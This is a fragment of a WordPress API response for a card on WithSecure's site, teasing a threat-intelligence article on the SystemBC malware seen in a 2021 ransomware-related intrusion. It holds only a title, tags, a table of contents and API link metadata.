https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-205x146.jpg 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Endpoint Security<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Ransomware<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Prelude to Ransomware: SystemBC<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">\nSami Ruohonen\nContent\n\nIntroduction\nIntrusion Technical Detail\nWrapper\nSystemBC Payload\nInitialization\nIndicators &amp; Detection\nShare this story\n\nIntroduction\nIn late February 2021, WithSecure\u2019s Managed Detection and Response (MDR) service identified the execution of SystemBC malware as part of a hands on keyboard crimeware intrusion. <\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/prelude-to-ransomware-systembc\/\">Mehr erfahren<\/a>            <\/div>\n            <\/div>\n<\/div>","_links":{"self":[{"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/lab_item\/10474","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/lab_item"}],"about":[{"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/types\/lab_item"}],"author":[{"embeddable":true,"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/users\/3"}],"wp:attachment":[{"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/media?parent=10474"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/categories?post=10474"},{"taxonomy":"labs_content_type","embeddable":true,"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/labs_content_type?post=10474"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}